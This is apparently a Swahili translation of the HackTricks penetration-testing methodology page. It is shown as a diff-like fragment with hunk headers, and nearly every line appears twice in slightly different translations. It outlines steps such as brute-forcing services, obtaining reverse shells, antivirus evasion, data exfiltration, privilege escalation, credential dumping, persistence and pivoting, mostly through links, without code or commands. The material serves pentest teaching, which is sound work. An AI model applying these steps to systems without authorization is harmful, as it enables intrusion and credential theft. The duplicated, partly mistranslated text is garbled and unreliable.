**Ikiwa huduma yako haipo kwenye index, tafuta kwenye Google** kwa mafunzo mengine na **niambie ikiwa unataka niiongeze.** Ikiwa **hupati chochote** kwenye Google, fanya **udukuzi wako wa kipofu**, unaweza kuanza kwa **kuunganisha kwenye huduma, kufanya fujo na kusoma majibu** (ikiwa yapo).
#### 5.1 Zana za Kiotomatiki
Pia kuna zana kadhaa zinazoweza kufanya **tathmini za udhaifu za kiotomatiki**. **Ningependekeza ujaribu** [**Legion**](https://github.com/carlospolop/legion)**, ambayo ni zana niliyounda na inategemea maelezo kuhusu udukuzi wa huduma unazoweza kupata katika kitabu hiki.**
Pia kuna zana kadhaa zinazoweza kufanya **tathmini za udhaifu za kiotomatiki**. **Ningependekeza ujaribu** [**Legion**](https://github.com/carlospolop/legion)**, ambayo ni zana niliyounda na inategemea maelezo kuhusu kudukua huduma unazoweza kupata katika kitabu hiki.**
#### **5.2 Kuvunja-Nguvu huduma**
Katika hali fulani **Kuvunja-Nguvu** inaweza kuwa na manufaa kwa **kuambukiza** **huduma**. [**Pata hapa Mwongozo wa haraka wa kuvunja-nguvu kwa huduma tofauti**](brute-force.md)**.**
Katika hali fulani, **Kuvunja-Nguvu** inaweza kuwa na manufaa kwa **kuambukiza** **huduma**. [**Pata hapa Mwongozo wa haraka wa kuvunja-nguvu kwa huduma tofauti**](brute-force.md)**.**
### 6- [Udukuzi wa Mtandaoni](phishing-methodology/)
@ -76,9 +76,9 @@ Ikiwa mpaka sasa hujapata udhaifu unaovutia **unaweza kuhitaji kujaribu udukuzi*
### **7-** [**Kupata Shell**](shells/)
Kwa njia fulani unapaswa kuwa umepata **njia ya kutekeleza nambari** kwa muathiriwa. Kisha, [orodha ya zana zinazowezekana ndani ya mfumo ambazo unaweza kutumia kupata shell ya nyuma itakuwa muhimu sana](shells/).
Kwa namna fulani unapaswa kuwa umepata **njia ya kutekeleza nambari** kwa muathiriwa. Kisha, [orodha ya zana zinazowezekana ndani ya mfumo ambazo unaweza kutumia kupata shell ya nyuma itakuwa muhimu sana](shells/).
Hasa kwenye Windows unaweza kuhitaji msaada wa **kuepuka antivirus**: [**Angalia ukurasa huu**](../windows-hardening/av-bypass.md)**.**\\
Hasa kwenye Windows unaweza kuhitaji msaada wa **kuepuka programu za kuzuia virusi**: [**Angalia ukurasa huu**](../windows-hardening/av-bypass.md)**.**\\
### 8- Ndani
@ -88,15 +88,15 @@ Ikiwa una matatizo na shell, unaweza kupata hapa **mkusanyiko mdogo wa amri muhi
* [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md)
* [**Windows (PS)**](../windows-hardening/basic-powershell-for-pentesters/)
### **9 -** [**Kutoa nje**](exfiltration.md)
### **9 -** [**Kutoa**](exfiltration.md)
Labda utahitaji **kutoa baadhi ya data kutoka kwa muathiriwa** au hata **kuweka kitu** (kama hati za uongezaji wa mamlaka). **Hapa una** [**chapisho kuhusu zana za kawaida unazoweza kutumia kwa madhumuni haya**](exfiltration.md)**.**
### **10- Ukarabati wa Mamlaka**
#### **10.1- Ukarabati wa Mamlaka wa Kienyeji**
#### **10.1- Ukarabati wa Mamlaka ya Kienyeji**
Ikiwa wewe si **root/Administrator** ndani ya sanduku, unapaswa kutafuta njia ya **kupandisha mamlaka.**\
Hapa unaweza kupata **mwongozo wa kupandisha mamlaka kienyeji katika** [**Linux**](../linux-hardening/privilege-escalation/) **na katika** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\
Ikiwa wewe si **root/Administrator** ndani ya sanduku, unapaswa kutafuta njia ya **kukarabati mamlaka.**\
Hapa unaweza kupata **mwongozo wa kukarabati mamlaka kienyeji katika** [**Linux**](../linux-hardening/privilege-escalation/) **na katika** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\
Pia unapaswa kuangalia kurasa hizi kuhusu jinsi **Windows inavyofanya kazi**:
* [**Uthibitisho, Vitambulisho, Mamlaka ya Token na UAC**](../windows-hardening/authentication-credentials-uac-and-efs/)
@ -104,32 +104,32 @@ Pia unapaswa kuangalia kurasa hizi kuhusu jinsi **Windows inavyofanya kazi**:
* Jinsi ya [**kuiba vitambulisho**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) kwenye Windows
* Mbinu kadhaa kuhusu [_**Active Directory**_](../windows-hardening/active-directory-methodology/)
**Usisahau kuangalia zana bora za kuhesabu njia za Ukarabati wa Mamlaka wa Kienyeji kwenye Windows na Linux:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
**Usisahau kuangalia zana bora za kuhesabu njia za Ukarabati wa Mamlaka ya Kienyeji kwenye Windows na Linux:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
#### **10.2- Ukarabati wa Mamlaka ya Kikoa**
Hapa unaweza kupata [**methodology inayoeleza hatua za kawaida sana za kuhesabu, kupandisha mamlaka na kudumisha kwenye Active Directory**](../windows-hardening/active-directory-methodology/). Hata kama hii ni sehemu tu ya sehemu, mchakato huu unaweza kuwa **wa kugusa sana** kwenye Ukarabati wa Mamlaka au Timu Nyekundu.
Hapa unaweza kupata [**methodolojia inayoeleza hatua za kawaida za kuhesabu, kukarabati mamlaka na kudumu kwenye Active Directory**](../windows-hardening/active-directory-methodology/). Hata kama hii ni sehemu tu ya sehemu, mchakato huu unaweza kuwa **wa kugusa sana** kwenye kazi ya Pentesting/Red Team.
### 11 - POST
#### **11.1 - Uporaji**
Angalia kama unaweza kupata **nywila zaidi** ndani ya mwenyeji au kama una **upatikanaji wa mashine nyingine** na **mamlaka** ya **mtumiaji wako**.\
Pata njia tofauti za [**kudump nywila kwenye Windows**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) hapa.
Angalia kama unaweza kupata **maneno ya siri zaidi** ndani ya mwenyeji au kama una **upatikanaji wa mashine nyingine** na **mamlaka** ya **mtumiaji wako**.\
Pata njia tofauti za [**kudump maneno ya siri kwenye Windows**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) hapa.
#### 11.2 - Udumishaji
#### 11.2 - Kudumu
**Tumia aina 2 au 3 tofauti za mbinu za udumishaji ili usihitaji kudukua mfumo tena.**\
**Hapa unaweza kupata mbinu za** [**udumishaji kwenye active directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
**Tumia aina 2 au 3 tofauti za mbinu za kudumu ili usihitaji kudukua mfumo tena.**\
**Hapa unaweza kupata mbinu za kudumu kwenye active directory** [**hapa**](../windows-hardening/active-directory-methodology/#persistence)**.**
TODO: Kamilisha Udumishaji wa Post kwenye Windows & Linux
TODO: Kamilisha chapisho la kudumu kwa Windows & Linux
### 12 - Kupindua
Kwa **vitambulisho vilivyokusanywa** unaweza kupata upatikanaji wa mashine nyingine, au labda unahitaji **kugundua na kutafuta mwenyeji mpya** (anza tena Ukarabati wa Mamlaka) ndani ya mitandao mipya ambapo mwathiriwa wako ameunganishwa.\
Katika kesi hii, tunnelling inaweza kuwa muhimu. Hapa unaweza kupata [**post inayozungumzia kuhusu tunnelling**](tunneling-and-port-forwarding.md).\
Bila shaka unapaswa pia kuangalia post kuhusu [Methodolojia ya Ukarabati wa Active Directory](../windows-hardening/active-directory-methodology/). Huko utapata mbinu za kusonga pembeni, kupandisha mamlaka na kudump vitambulisho.\
Angalia pia ukurasa kuhusu [**NTLM**](../windows-hardening/ntlm/), inaweza kuwa na manufaa sana kwa kupindua kwenye mazingira ya Windows.
Kwa **vitambulisho vilivyokusanywa** unaweza kupata upatikanaji wa mashine nyingine, au labda unahitaji **kugundua na kutafuta mwenyeji mpya** (anza tena Mbinu ya Pentesting) ndani ya mitandao mipya ambapo mwathiriwa wako ameunganishwa.\
Katika kesi hii, tunnelling inaweza kuwa muhimu. Hapa unaweza kupata [**chapisho linalozungumzia kuhusu tunnelling**](tunneling-and-port-forwarding.md).\
Bila shaka unapaswa pia kuangalia chapisho kuhusu [Methodolojia ya Pentesting ya Active Directory](../windows-hardening/active-directory-methodology/). Huko utapata mbinu nzuri za kusonga upande, kukarabati mamlaka na kudump vitambulisho.\
Angalia pia ukurasa kuhusu [**NTLM**](../windows-hardening/ntlm/), inaweza kuwa na manufaa sana kwa kupindua kwenye mazingira ya Windows..
### ZAIDI
@ -137,11 +137,11 @@ Angalia pia ukurasa kuhusu [**NTLM**](../windows-hardening/ntlm/), inaweza kuwa
#### **Kudukua**
* [**Kudukua Msingi wa Linux**](../binary-exploitation/linux-exploiting-basic-esp.md)
* [**Kudukua Msingi wa Linux**](broken-reference)
* [**Kudukua Msingi wa Windows**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
* [**Zana za Msingi za Kudukua**](../binary-exploitation/basic-binary-exploitation-methodology/tools/)
* [**Zana za Msingi za Kudukua**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/)
#### [**Python Msingi**](python/)
#### [**Python ya Msingi**](python/)
#### **Mbinu za Crypto**
@ -149,9 +149,9 @@ Angalia pia ukurasa kuhusu [**NTLM**](../windows-hardening/ntlm/), inaweza kuwa
* [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
* [**Oracle ya Padding**](../crypto-and-stego/padding-oracle-priv.md)
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
Ikiwa una nia katika **kazi ya udukuzi** na kudukua yasiyoweza kudukuliwa - **tunakupa kazi!** (_uwezo wa kuandika na kuzungumza Kipolishi kwa ufasaha unahitajika_).
Ikiwa una nia ya **kazi ya udukuzi** na kudukua yasiyoweza kudukuliwa - **tunahitaji wewe!** (_inahitajika uwezo wa kuzungumza na kuandika Kipolishi kwa ufasaha_).
{% embed url="https://www.stmcyber.com/careers" %}
@ -163,7 +163,7 @@ Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.